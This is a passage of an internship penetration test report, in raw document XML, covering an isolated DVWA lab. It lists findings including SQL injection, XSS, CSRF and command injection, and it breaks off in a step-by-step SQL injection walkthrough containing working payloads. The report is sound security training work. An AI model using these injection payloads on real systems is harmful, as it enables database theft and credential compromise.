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2A44"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2A44"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1000"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Damn Vulnerable Web Application (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared as part of the Cybersecurity &amp; Ethical Hacking Internship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone Project — Task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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Target Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">DVWA v1.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">192.168.56.106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux — 192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Authorized, controlled lab penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Isolated VirtualBox host-only network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Navya Bhatia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a penetration test conducted against the Damn Vulnerable Web Application (DVWA), hosted in an isolated lab environment for training purposes. The objective was to identify, exploit, and document security vulnerabilities using the same methodology and tools used in real-world web application penetration tests, and to recommend appropriate remediation for each finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing was carried out manually to demonstrate real exploitation impact rather than relying solely on automated scanning. One critical vulnerability was identified and fully exploited during this assessment: a SQL Injection flaw in the application's user lookup feature, which allowed complete extraction of the application's user database, including password hashes, using a database account with root-level privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The password hashes recovered were subsequently cracked in seconds using a dictionary attack, confirming that weak password practices compounded the impact of the vulnerability. Detailed findings, evidence, and remediation guidance are provided in the sections below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assess the security of the DVWA web application running on a Metasploitable-style lab target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify vulnerabilities aligned with the OWASP Top 10 web application security risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manually exploit identified vulnerabilities to demonstrate real-world impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document each finding with reproducible steps, evidence, severity rating, and remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">All testing was performed exclusively against a self-hosted, isolated instance of DVWA within a private VirtualBox host-only network. No production systems or third-party assets were involved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing followed a standard penetration testing workflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnaissance — Identifying the target application, version, and technology stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scanning &amp; Enumeration — Reviewing input fields and application behavior for weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation — Manually crafting and testing payloads against identified inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-Exploitation — Extracting data and assessing the real-world impact of each vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reporting — Documenting findings, evidence, severity, and remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVWA's Security Level was set to "Low" to first establish and confirm the presence of each vulnerability in its most exploitable state, consistent with standard practice for demonstrating maximum impact before validating fixes at higher security settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Summary of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2100"/>
        <w:gridCol w:w="2500"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (UNION-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Scripting (Reflected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Scripting (Stored)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Request Forgery (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 SQL Injection (UNION-Based) — User ID Parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEVERITY: CRITICAL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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/dvwa/vulnerabilities/sqli/  (User ID input field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-89: SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">id (GET parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Yes (low-privilege application login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SQL Injection module in DVWA accepts a User ID and returns the corresponding user's first name and surname. The application fails to sanitize or parameterize this input before including it in a SQL query, allowing an attacker to inject arbitrary SQL syntax. This was exploited using a classic UNION-based SQL injection technique to read arbitrary data from the underlying MySQL database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Confirm the injection point and bypass the query logic:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: The query returned every row in the users table instead of a single user, confirming the field was directly concatenated into the SQL query without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Determine the number of columns in the original query using ORDER BY:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' ORDER BY 1-- -</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' ORDER BY 2-- -</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' ORDER BY 3-- -   (returned a database error)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: The query breaks at column 3, confirming the original SELECT statement uses exactly 2 columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Confirm both columns are reflected on the page using UNION SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
